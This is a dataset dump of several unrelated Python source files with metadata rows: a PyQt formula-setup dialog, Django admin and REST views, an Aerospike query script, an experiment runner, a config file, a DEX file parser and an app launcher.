self.formulaNameLineEdit = QLineEdit(self.newFormulaContainerFrame)
self.formulaNameLineEdit.setObjectName(u"formulaNameLineEdit")
self.verticalLayout_3.addWidget(self.formulaNameLineEdit)
self.categoryLabel1 = QLabel(self.newFormulaContainerFrame)
self.categoryLabel1.setObjectName(u"categoryLabel1")
self.verticalLayout_3.addWidget(self.categoryLabel1)
self.newCategoryComboBox = QComboBox(self.newFormulaContainerFrame)
self.newCategoryComboBox.setObjectName(u"newCategoryComboBox")
self.newCategoryComboBox.setEditable(True)
self.verticalLayout_3.addWidget(self.newCategoryComboBox)
self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)
self.verticalLayout_3.addItem(self.verticalSpacer)
self.horizontalSpacer_2 = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.verticalLayout_3.addItem(self.horizontalSpacer_2)
self.horizontalLayout_4.addWidget(self.newFormulaContainerFrame)
self.revisionContainerFrame = QFrame(self.bodyContainerWidget)
self.revisionContainerFrame.setObjectName(u"revisionContainerFrame")
self.revisionContainerFrame.setFrameShape(QFrame.StyledPanel)
self.verticalLayout_2 = QVBoxLayout(self.revisionContainerFrame)
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.revisionContainerLabel = QLabel(self.revisionContainerFrame)
self.revisionContainerLabel.setObjectName(u"revisionContainerLabel")
self.revisionContainerLabel.setAlignment(Qt.AlignCenter)
self.verticalLayout_2.addWidget(self.revisionContainerLabel)
self.categoryLabel2 = QLabel(self.revisionContainerFrame)
self.categoryLabel2.setObjectName(u"categoryLabel2")
self.verticalLayout_2.addWidget(self.categoryLabel2)
self.revisionCategoryComboBox = QComboBox(self.revisionContainerFrame)
self.revisionCategoryComboBox.setObjectName(u"revisionCategoryComboBox")
self.revisionCategoryComboBox.setEditable(False)
self.revisionCategoryComboBox.setInsertPolicy(QComboBox.NoInsert)
self.verticalLayout_2.addWidget(self.revisionCategoryComboBox)
self.revisedFormulaPromptLabel = QLabel(self.revisionContainerFrame)
self.revisedFormulaPromptLabel.setObjectName(u"revisedFormulaPromptLabel")
self.verticalLayout_2.addWidget(self.revisedFormulaPromptLabel)
self.formulasToDateComboBox = QComboBox(self.revisionContainerFrame)
self.formulasToDateComboBox.setObjectName(u"formulasToDateComboBox")
self.formulasToDateComboBox.setEditable(True)
self.formulasToDateComboBox.setInsertPolicy(QComboBox.NoInsert)
self.verticalLayout_2.addWidget(self.formulasToDateComboBox)
self.previousVersionLabel = QLabel(self.revisionContainerFrame)
self.previousVersionLabel.setObjectName(u"previousVersionLabel")
self.verticalLayout_2.addWidget(self.previousVersionLabel)
self.previousVersionPlaceholderLabel = QLabel(self.revisionContainerFrame)
self.previousVersionPlaceholderLabel.setObjectName(u"previousVersionPlaceholderLabel")
self.verticalLayout_2.addWidget(self.previousVersionPlaceholderLabel)
self.horizontalSpacer = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.verticalLayout_2.addItem(self.horizontalSpacer)
self.horizontalLayout_4.addWidget(self.revisionContainerFrame)
self.verticalLayout.addWidget(self.bodyContainerWidget)
self.buttonBox = QDialogButtonBox(formulaSetupDialog)
self.buttonBox.setObjectName(u"buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(formulaSetupDialog)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.close)
#self.buttonBox.accepted.connect(formulaSetupDialog.accept)
#self.buttonBox.rejected.connect(formulaSetupDialog.close)
##
self.revisionContainerFrame.setDisabled(True)
self.newFormulaContainerFrame.setDisabled(True)
###
self.revisionRadioBtn.toggled.connect(self.newFormulaContainerFrame.setDisabled)
self.revisionRadioBtn.toggled.connect(self.revisionContainerFrame.setEnabled)
self.newFormulaRadioBtn.toggled.connect(self.revisionContainerFrame.setDisabled)
self.newFormulaRadioBtn.toggled.connect(self.newFormulaContainerFrame.setEnabled)
QMetaObject.connectSlotsByName(formulaSetupDialog)
# setupUi
def retranslateUi(self, formulaSetupDialog):
formulaSetupDialog.setWindowTitle(QCoreApplication.translate("formulaSetupDialog", u"Setup", None))
self.dialogHeaderLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Formula Setup", None))
self.revisionPromptLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Is this a revision of a previous formula, or an entirely new formula?", None))
self.newFormulaRadioBtn.setText(QCoreApplication.translate("formulaSetupDialog", u"New Formula", None))
self.revisionRadioBtn.setText(QCoreApplication.translate("formulaSetupDialog", u"Revision", None))
self.formulaContainerLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"New Formula", None))
self.formulaNamePromptLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"What is the new formula name?", None))
self.categoryLabel1.setText(QCoreApplication.translate("formulaSetupDialog", u"Category", None))
self.revisionContainerLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Revision", None))
self.categoryLabel2.setText(QCoreApplication.translate("formulaSetupDialog", u"Category", None))
self.revisedFormulaPromptLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Select formula to be revised", None))
self.previousVersionLabel.setText(QCoreApplication.translate("formulaSetupDialog", u"Previous Version", None))
self.previousVersionPlaceholderLabel.setText("")
# retranslateUi
def setupLogic(self):
"""
-----------------------------
Purpose:
- Event setup, QModel data fill
Arguments:
- None
Return Value:
- None
"""
# creates the item models for the category boxes
categoryModel = QStandardItemModel()
with dbConnection('FormulaSchema').cursor() as cursor:
cursor.execute('SELECT DISTINCT category_name, category.category_id FROM formula INNER JOIN category ON formula.formula_category_id = category.category_id')
categories = cursor.fetchall()
for category in categories:
categoryItem = QStandardItem()
categoryItem.setText(category['category_name'])
categoryItem.setData(category, Qt.UserRole)
categoryModel.appendRow(categoryItem)
self.newCategoryComboBox.setModel(categoryModel)
self.revisionCategoryComboBox.setModel(categoryModel)
self.revisionCategoryComboBox.setCurrentIndex(-1)
# signal setup
self.revisionCategoryComboBox.currentIndexChanged.connect(self.comboBoxUpdate)
self.formulasToDateComboBox.currentIndexChanged.connect(self.updatePlaceholderLabel)
def comboBoxUpdate(self):
"""
-----------------------------
Purpose:
- Signal setup
Arguments:
- None
Return Value:
- None
"""
revisionComboboxSelection = self.revisionCategoryComboBox.itemData(self.revisionCategoryComboBox.currentIndex(), Qt.UserRole)
if revisionComboboxSelection is None:
return
else:
categoryID = revisionComboboxSelection['category_id']
if categoryID is None:
return
prevFormulasModel = QStandardItemModel()
blankItem = QStandardItem()
blankItem.setText('SELECT')
blankItem.setEditable(False)
blankItem.setData(0, Qt.UserRole)
prevFormulasModel.appendRow(blankItem)
# fills the data from
with dbConnection('FormulaSchema').cursor() as cursor:
cursor.execute('SELECT formula.formula_id, formula_name, formula.version_number, formula.formula_category_id, formula.version_of_id, category.category_name, category.category_id FROM formula LEFT JOIN category ON category.category_id = formula.formula_category_id WHERE formula.formula_category_id = %s', (categoryID,))
formulas = cursor.fetchall()
for formula in formulas:
formulaItem = QStandardItem()
formulaItem.setText(formula['formula_name'].title())
formulaItem.setData(formula, Qt.UserRole)
prevFormulasModel.appendRow(formulaItem)
self.formulasToDateComboBox.setModel(prevFormulasModel)
# updates the version number label
def updatePlaceholderLabel(self):
"""
-----------------------------
Purpose:
- Updates the version number label
Arguments:
- None
Return Value:
- None
"""
itemData = self.formulasToDateComboBox.itemData(self.formulasToDateComboBox.currentIndex(), Qt.UserRole)
if itemData == 0 or itemData is None:
return
versionNumber = itemData['version_number']
if versionNumber:
self.previousVersionPlaceholderLabel.setText(str(versionNumber))
else:
self.previousVersionPlaceholderLabel.setText('None')
# form accept
def accept(self):
"""
-----------------------------
Purpose:
- Method for calling the Formula Editor window
Arguments:
- None
Return Value:
- None
"""
# if neither new formula or revision is indicated, throws an error message and returns
if self.revisionRadioBtn.isChecked() is False and self.newFormulaRadioBtn.isChecked() is False:
msg = QMessageBox()
msg.setText('Please indicate whether this formula is new or a revision/iteration')
msg.exec_()
return
else:
isRevision = self.revisionRadioBtn.isChecked()
if isRevision is False:
# if the formula is new but no name was inputted
if self.formulaNameLineEdit.text() == '' or self.formulaNameLineEdit.text() is None:
msg = QMessageBox()
msg.setText('Input a formula name to continue')
msg.exec_()
return
# if everything goes right
else:
name = self.formulaNameLineEdit.text().title()
formulaEditor = formulaEditorDialog(self.mainWindow, formulaName = name, revision = False, category = self.newCategoryComboBox.currentText())
self.close()
formulaEditor.exec_()
else:
# if formula is a revision, but no previous formula was chosen
if self.formulasToDateComboBox.currentIndex() == -1:
msg = QMessageBox()
msg.setText('Select a previous formula that you are revising')
msg.exec_()
return
# if everything goes right
else:
prevID = self.formulasToDateComboBox.currentData(Qt.UserRole)['version_number']
prevName = self.formulasToDateComboBox.currentText().title()
#if isRevision is False:
formulaEditor = formulaEditorDialog(self.mainWindow, formulaName = prevName, revision = isRevision, prevRevisionID = prevID, category = self.revisionCategoryComboBox.currentText())
formulaEditor.exec_()
self.close()
'''
app = QApplication(sys.argv)
gui = formulaSetupDialog(app)
gui.show()
sys.exit(app.exec_())
#test(formulaSetupDialog)''' | 45.713542 | 331 | 0.69346 | 1,433 | 17,554 | 8.438939 | 0.200977 | 0.034731 | 0.042669 | 0.043662 | 0.198958 | 0.079219 | 0.079219 | 0.072439 | 0.033408 | 0 | 0 | 0.007005 | 0.211177 | 17,554 | 384 | 332 | 45.713542 | 0.866325 | 0.076507 | 0 | 0.10084 | 1 | 0.004202 | 0.107539 | 0.026452 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.029412 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77b129b5d479815397258c26813a6279a03a1dcc | 453 | py | Python | dienstplan/dienste/admin.py | MikeTsenatek/DienstplanV2 | 618e398c91fe7e4038d42eb34008e4df5063fb42 | [
"MIT"
] | null | null | null | dienstplan/dienste/admin.py | MikeTsenatek/DienstplanV2 | 618e398c91fe7e4038d42eb34008e4df5063fb42 | [
"MIT"
] | null | null | null | dienstplan/dienste/admin.py | MikeTsenatek/DienstplanV2 | 618e398c91fe7e4038d42eb34008e4df5063fb42 | [
"MIT"
] | null | null | null | from django.contrib import admin
# Register your models here.
from .models import DpDienste,DpBesatzung
class BesatzungInline(admin.TabularInline):
model = DpBesatzung
extra = 0
class DiensteAdmin(admin.ModelAdmin):
list_display = ('tag', 'schicht', 'ordner', 'ordner_name')
list_filter = ('ordner__dienstplan', 'ordner__jahr', 'ordner__monat', 'tag')
inlines = [BesatzungInline]
admin.site.register(DpDienste, DiensteAdmin)
| 22.65 | 80 | 0.737307 | 49 | 453 | 6.632653 | 0.632653 | 0.123077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002597 | 0.15011 | 453 | 19 | 81 | 23.842105 | 0.841558 | 0.057395 | 0 | 0 | 0 | 0 | 0.171765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.9 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
77b75ef5b70b72a8fcecd1918e8072f524ec97fa | 892 | py | Python | query.py | IntimateMerger/dockerfile-aql | f1d4f36038a718857613516e9562b25910d070f0 | [
"Apache-2.0"
] | null | null | null | query.py | IntimateMerger/dockerfile-aql | f1d4f36038a718857613516e9562b25910d070f0 | [
"Apache-2.0"
] | null | null | null | query.py | IntimateMerger/dockerfile-aql | f1d4f36038a718857613516e9562b25910d070f0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import time
import aerospike
from aerospike import predicates as p
if __name__ == "__main__":
if len(sys.argv) == 6:
as_host = str(sys.argv[1])
ns_name = str(sys.argv[2])
st_name = str(sys.argv[3])
key_name = str(sys.argv[4])
days = int(sys.argv[5])
now = int(time.time())
min_ts = now - (60 * 60 * 24 * days)
max_ts = 2147483647 # 2038-01-19 12:14:07
cl = aerospike.client({'hosts': [(as_host, 3000)]}).connect()
query = cl.query(ns_name, st_name)
query.select(key_name)
query.where(p.between("ts", min_ts, max_ts))
def echo((key, meta, bins)):
print(bins[key_name])
query.foreach(echo, {"timeout": 0})
else:
print("usage: python -u query.py [hostname] [namespace] [set] [key] [days]")
| 27.030303 | 84 | 0.565022 | 130 | 892 | 3.715385 | 0.538462 | 0.086957 | 0.082816 | 0.086957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0.270179 | 892 | 32 | 85 | 27.875 | 0.677419 | 0.069507 | 0 | 0 | 0 | 0.043478 | 0.107618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.173913 | null | null | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77b97cfe8cb7188fc56132de4e76018734d576ae | 1,317 | py | Python | parallel.py | ambimanus/demand-response-cohda | 29b03f9fb264cd1e169ed2ed9a895df9558cb214 | [
"MIT"
] | 1 | 2017-05-04T16:18:23.000Z | 2017-05-04T16:18:23.000Z | parallel.py | ambimanus/demand-response-cohda | 29b03f9fb264cd1e169ed2ed9a895df9558cb214 | [
"MIT"
] | null | null | null | parallel.py | ambimanus/demand-response-cohda | 29b03f9fb264cd1e169ed2ed9a895df9558cb214 | [
"MIT"
] | 1 | 2020-07-26T18:07:31.000Z | 2020-07-26T18:07:31.000Z | # coding=utf-8
from __future__ import division
import sys
import os
import pickle
from configuration import Configuration
import main
def run(cfg_dict):
cfg = main.main(Configuration(**cfg_dict))
fn = str(os.path.join(cfg.basepath, '.'.join(
('cfg', cfg.title, str(cfg.seed), 'pickle'))))
with open(fn, 'w') as f:
pickle.dump(cfg, f)
if __name__ == '__main__':
runs = 10
params = []
for lag in range(0, 6):
for seed in range(runs):
cfg_dict = {
'title': 'lag%02d' % lag,
'seed': seed,
'n': 1500,
'it': 1441,
'lag': lag,
}
params.append(cfg_dict)
if 'SGE_TASK_ID' in os.environ:
# HERO HPC cluster
run(params[int(os.environ['SGE_TASK_ID'])-1])
elif 'PARALLEL_SEQ' in os.environ:
# GNU parallel
run(params[int(os.environ['PARALLEL_SEQ'])-1])
else:
# sequential
start, stop = 0, len(params)
if len(sys.argv) == 2:
print len(params)
sys.exit(0)
elif len(sys.argv) == 3:
start, stop = int(sys.argv[1]), int(sys.argv[2])
if start >= len(params):
sys.exit(0)
for p in params[start:stop]:
run(p)
| 24.388889 | 60 | 0.516325 | 172 | 1,317 | 3.825581 | 0.406977 | 0.042553 | 0.027356 | 0.042553 | 0.115502 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02781 | 0.344723 | 1,317 | 53 | 61 | 24.849057 | 0.734647 | 0.040243 | 0 | 0.05 | 0 | 0 | 0.069102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.15 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77cb970ba8e0144097ddb18a91129b58ff4a61e3 | 196 | py | Python | app/config/secure.py | xiaojieluo/flask_restapi_template | 70b93c90d3cf9dd53a4dcbeb05bf2f67b81bfc01 | [
"Apache-2.0"
] | null | null | null | app/config/secure.py | xiaojieluo/flask_restapi_template | 70b93c90d3cf9dd53a4dcbeb05bf2f67b81bfc01 | [
"Apache-2.0"
] | null | null | null | app/config/secure.py | xiaojieluo/flask_restapi_template | 70b93c90d3cf9dd53a4dcbeb05bf2f67b81bfc01 | [
"Apache-2.0"
] | null | null | null | SQLALCHEMY_DATABASE_URI = \
'mysql+cymysql://root:00000000@localhost/ucar'
SECRET_KEY = '***'
SQLALCHEMY_TRACK_MODIFICATIONS = True
MINA_APP = {
'AppID': '***',
'AppSecret': '***'
}
| 17.818182 | 50 | 0.642857 | 19 | 196 | 6.315789 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.163265 | 196 | 10 | 51 | 19.6 | 0.682927 | 0 | 0 | 0 | 0 | 0 | 0.341837 | 0.22449 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77ce08d2e97b02ad8f56c59858aeebde6eada6c4 | 941 | py | Python | onepanman_api/views/api/code.py | Capstone-onepanman/api-server | 1a5174fbc441d2718f3963863590f634ba2014e1 | [
"MIT"
] | null | null | null | onepanman_api/views/api/code.py | Capstone-onepanman/api-server | 1a5174fbc441d2718f3963863590f634ba2014e1 | [
"MIT"
] | 12 | 2020-03-24T18:09:30.000Z | 2022-03-12T00:15:07.000Z | onepanman_api/views/api/code.py | Capstone-onepanman/api-server | 1a5174fbc441d2718f3963863590f634ba2014e1 | [
"MIT"
] | null | null | null | import django_filters
from rest_framework import viewsets
from onepanman_api.models import Code
from onepanman_api.serializers.code import CodeSerializer
from rest_framework.mixins import ListModelMixin
from rest_framework.response import Response
from rest_framework.views import APIView
class CodeViewSet(viewsets.ModelViewSet):
queryset = Code.objects.all()
serializer_class = CodeSerializer
filter_backends = (django_filters.rest_framework.DjangoFilterBackend,)
filter_fields = ('author', 'problem', 'available_game')
def create(self, request, *args, **kwargs):
data = super().create(request, *args, **kwargs)
# 여기서 celery 코드 추가!
return Response(data)
class MyCodeView(APIView):
def get(self, request, version):
queryset = Code.objects.all().filter(author=request.user.pk)
serializer = CodeSerializer(queryset, many=True)
return Response(serializer.data)
| 29.40625 | 74 | 0.744952 | 108 | 941 | 6.37037 | 0.490741 | 0.094477 | 0.098837 | 0.063953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165781 | 941 | 31 | 75 | 30.354839 | 0.876433 | 0.018066 | 0 | 0 | 0 | 0 | 0.029284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.35 | 0 | 0.85 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
77d586d8a485283ddae1a7482067b25ac7df8cd7 | 8,337 | py | Python | dex/dexinfo.py | callmejacob/dexfactory | 2de996927ee9f036b2c7fc6cb04f43ac790f35af | [
"BSD-2-Clause"
] | 7 | 2018-06-14T10:40:47.000Z | 2021-05-18T08:55:34.000Z | dex/dexinfo.py | callmejacob/dexfactory | 2de996927ee9f036b2c7fc6cb04f43ac790f35af | [
"BSD-2-Clause"
] | 1 | 2020-05-28T08:59:50.000Z | 2020-05-28T08:59:50.000Z | dex/dexinfo.py | callmejacob/dexfactory | 2de996927ee9f036b2c7fc6cb04f43ac790f35af | [
"BSD-2-Clause"
] | 3 | 2018-02-28T02:08:06.000Z | 2018-09-12T03:09:18.000Z | # -- coding: utf-8 --
import numpy as np
import hashlib
import zlib
from section import *
class DexInfo(object):
"""
dex信息
"""
def __init__(self, dex_path, dex_bytes = None):
"""
初始化
dex_path: dex的文件路径
self.dex_bytes: dex的字节数组
self.header: 头部信息的字节数组
"""
# 记录文件路径
self.dex_path = dex_path
# 获取dex的字节数组
if dex_bytes is None:
self.dex_bytes = np.fromfile(dex_path, dtype=np.ubyte)
else:
self.dex_bytes = dex_bytes
# context
self.context = Context()
# 解码section列表
self.decode()
def decode(self):
"""
解码所有的section列表
"""
# 1. 获取头信息
header = HeaderSection(self.context, self.dex_bytes, 1, 0).getItem(0)
# 2. 获取map列表
map_item_list = MapItemListSection(self.context, self.dex_bytes, 1, header.map_off)
# 3. 解析所有的section字段
for item in map_item_list.getItemDataList():
section_type = item.getSectionType()
section_item_size = item.getSectionItemSize()
section_off = item.getSectionOff()
section_class = section_class_map[section_type]
if section_class:
# print section_class
section = section_class(self.context, self.dex_bytes, section_item_size, section_off)
# 4. 转换[off ---> id]
self.convertOffToIdForAllSections()
# 5. 转换[id ---> item]
self.convertIdToItemForAllSections()
# 6. 记录头部信息
self.header_section = self.context.getSection(TYPE_HEADER_ITEM)
self.header = self.header_section.getItem(0)
def encode(self):
"""
编码所有的section列表
"""
# 1. 重新编码所有的section
self.encodeAllSections()
# 2. 重新计算section偏移,并更新到map_list和header两个section中
self.genAllSectionsOffAndSize()
# 3. 转换[item ---> id]
self.convertItemToIdForAllSections()
# 4. 转换[id ---> off]
self.convertIdToOffForAllSections()
# 5. 重新编码调整过的section,并拷贝到字节数组中
self.encodeAllSections()
self.copyAllSections()
# 6. 重新计算sig和checksum信息
self.recalSigAndChecksum()
def encodeAllSections(self):
"""
编码所有的section列表
"""
section_list = self.context.getSectionList()
# 记录原有的hex信息
src_hex_list = []
for section in section_list:
src_hex_list.append(section.tohexstring())
# 列表重新编码
for section in section_list:
section.encode()
section_list = self.context.getSectionList()
# 记录原有的hex信息
dst_hex_list = []
for section in section_list:
dst_hex_list.append(section.tohexstring())
# 对比
# string = 'encode_all_sections diff {\n'
# string += 'len: %r\n' % (len(src_hex_list) == len(dst_hex_list))
# for i in range(len(src_hex_list)):
# src_hex_bytes = src_hex_list[i]
# dst_hex_bytes = dst_hex_list[i]
# section = section_list[i]
# section_desc = type_desc_map[section.section_type]
# diff_result = diffBytes(src_hex_bytes, dst_hex_bytes)
# string += '-' * 100 + '\n'
# string += '%s: %r\n' % (section_desc, diff_result)
# if True:
# string += 'src: [%s]\n\n' % src_hex_bytes
# string += 'dst: [%s]\n' % dst_hex_bytes
# string += '-' * 100 + '\n'
# string += '}\n'
# print string
def genAllSectionsOffAndSize(self):
"""
更新所有section的偏移和大小
"""
map_list_section = self.context.getSection(TYPE_MAP_LIST)
header = self.header
section_list = self.context.getSectionList()
section_size_off_map = {}
for section_type in type_list:
section_size_off_map[section_type] = None
# 计算section偏移
section_off = 0
for section in section_list:
section_size_off_map[section.section_type] = [section.getItemSize(), section_off]
# print '%.4x: [%.4x %.4x %.4d] (%s)' % (section.section_type, section.getItemSize(), section_off, section.getBytesSize(), type_desc_map[section.section_type])
# print 'pre section_off: %.4x bytes_size: %.4d' % (section_off, section.getBytesSize())
section_off += section.getBytesSize()
# print 'next section_off: %.4x bytes_size: %.4d' % (section_off, section.getBytesSize())
file_size = section_off
if file_size % 0x02 != 0: # 确保数据区尺寸为偶数
file_size += 0x01
# print 'file_size: %.4x' % file_size
# 更新到map_list_section中
for map_item in map_list_section.getItemDataList():
section_type = map_item.getSectionType()
section_item_size, section_item_off = section_size_off_map[section_type]
map_item.setSectionItemSize(section_item_size)
map_item.setSectionOff(section_item_off)
map_list_section.encode()
# 更新到头部信息
# print 'Before gen header:\n', header.tostring()
header.setFileSize(file_size)
section_item_size, section_off = section_size_off_map[TYPE_MAP_LIST]
header.setMapOff(section_off)
section_item_size, section_off = section_size_off_map[TYPE_STRING_ID_ITEM]
header.setStringIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_TYPE_ID_ITEM]
header.setTypeIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_PROTO_ID_ITEM]
header.setProtoIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_FIELD_ID_ITEM]
header.setFieldIdInfo(section_item_size, section_off)
section_item_size, section_off = section_size_off_map[TYPE_METHOD_ID_ITEM]
header.setMethodInfo(section_item_size, section_off)
section_item_size, class_def_section_off = section_size_off_map[TYPE_CLASS_DEF_ITEM]
header.setClassDefInfo(section_item_size, class_def_section_off)
class_def_section = self.context.getSection(TYPE_CLASS_DEF_ITEM)
data_area_off = class_def_section_off + class_def_section.getBytesSize()
data_area_size = file_size - data_area_off
header.setDataInfo(data_area_size, data_area_off)
# print 'After gen header:\n', header.tostring()
def copyAllSections(self):
"""
拷贝所有的section
"""
section_list = self.context.getSectionList()
header = self.header
# 重新调整字节数组大小
bytes = createBytes(header.file_size)
# 依次拷贝section
section_off = 0
for section in section_list:
section_bytes_size = section.getBytesSize()
bytes[section_off:section_off+section_bytes_size] = section.getBytes()
section_off += section_bytes_size
# 比较字节数组
# diff_result = diffBytes(self.dex_bytes, bytes)
# print 'after copy_all_sections:\n', diff_result
# 重新调整dex的字节数组
self.dex_bytes = bytes
def printAllSections(self):
"""
打印所有的section列表
"""
section_list = self.context.getSectionList()
for section in section_list:
if section:
print section.tostring()
def printSection(self, section_type):
''' 打印指定类型的section '''
section = self.context.getSection(section_type)
if section:
print section.tostring()
def convertOffToIdForAllSections(self):
''' 转换文件偏移量到相关的id '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertOffToId()
def convertIdToOffForAllSections(self):
''' 转换id到相关的文件偏移量 '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertIdToOff()
def convertIdToItemForAllSections(self):
''' 转换id到item对象 '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertIdToItem()
def convertItemToIdForAllSections(self):
''' 转换item对象到id '''
section_list = self.context.getSectionList()
for section in section_list:
section.convertItemToId()
# if section.section_type == TYPE_PROTO_ID_ITEM:
# print section.tostring()
def getContext(self):
"""
获取上下文信息
"""
return self.context
def save(self, dex_path=None):
"""
将字节数组保存到文件中
"""
if dex_path is None:
dex_path = self.dex_path
if not dex_path is None:
self.dex_bytes.tofile(dex_path)
def recalSigAndChecksum(self):
"""
计算sig和checksum信息
"""
dex_bytes = self.dex_bytes
dex_size = len(dex_bytes)
# 计算sig
sig = hashlib.sha1(dex_bytes[32:dex_size]).hexdigest()
self.header.setSignature(bytearray.fromhex(sig))
# 更新sig到dex_bytes中
self.header_section.encode()
dex_bytes[0x00:self.header_section.getBytesSize()] = self.header_section.getBytes()
# 计算checksum (checksum的计算包含了sig,所以需要sig先写入)
checksum = zlib.adler32(dex_bytes[12:dex_size])
self.header.setChecksum(convertIntToBytes(checksum))
# 更新checksum到dex_bytes中
self.header_section.encode()
dex_bytes[0x00:self.header_section.getBytesSize()] = self.header_section.getBytes()
def tostring(self):
string = ''
section_list = self.context.getSectionList()
for section in section_list:
if section:
string += section.tostring()
return string
| 26.382911 | 164 | 0.732997 | 1,050 | 8,337 | 5.517143 | 0.18381 | 0.051787 | 0.058692 | 0.04937 | 0.40687 | 0.324702 | 0.263767 | 0.207492 | 0.200587 | 0.186432 | 0 | 0.007816 | 0.155931 | 8,337 | 315 | 165 | 26.466667 | 0.815404 | 0.208828 | 0 | 0.248276 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002624 | 0 | 0 | 0 | null | null | 0 | 0.027586 | null | null | 0.027586 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77d66e14d713bc6998d6a77e5587d84eb4585cb9 | 255 | py | Python | launch.py | rugleb/cad | 0fd3732b57398e4eacfbc4872286254068d1754a | [
"MIT"
] | 3 | 2019-01-28T14:20:23.000Z | 2020-09-09T20:19:23.000Z | launch.py | rugleb/cad | 0fd3732b57398e4eacfbc4872286254068d1754a | [
"MIT"
] | 7 | 2019-01-15T08:30:59.000Z | 2019-01-25T17:11:43.000Z | launch.py | rugleb/CAD | 0fd3732b57398e4eacfbc4872286254068d1754a | [
"MIT"
] | 1 | 2021-07-19T07:28:25.000Z | 2021-07-19T07:28:25.000Z | #!/usr/bin/env python
import sys
from PyQt5.QtWidgets import QApplication
from cad.application import Application
if __name__ == '__main__':
app = QApplication(sys.argv)
workspace = Application()
workspace.show()
sys.exit(app.exec_())
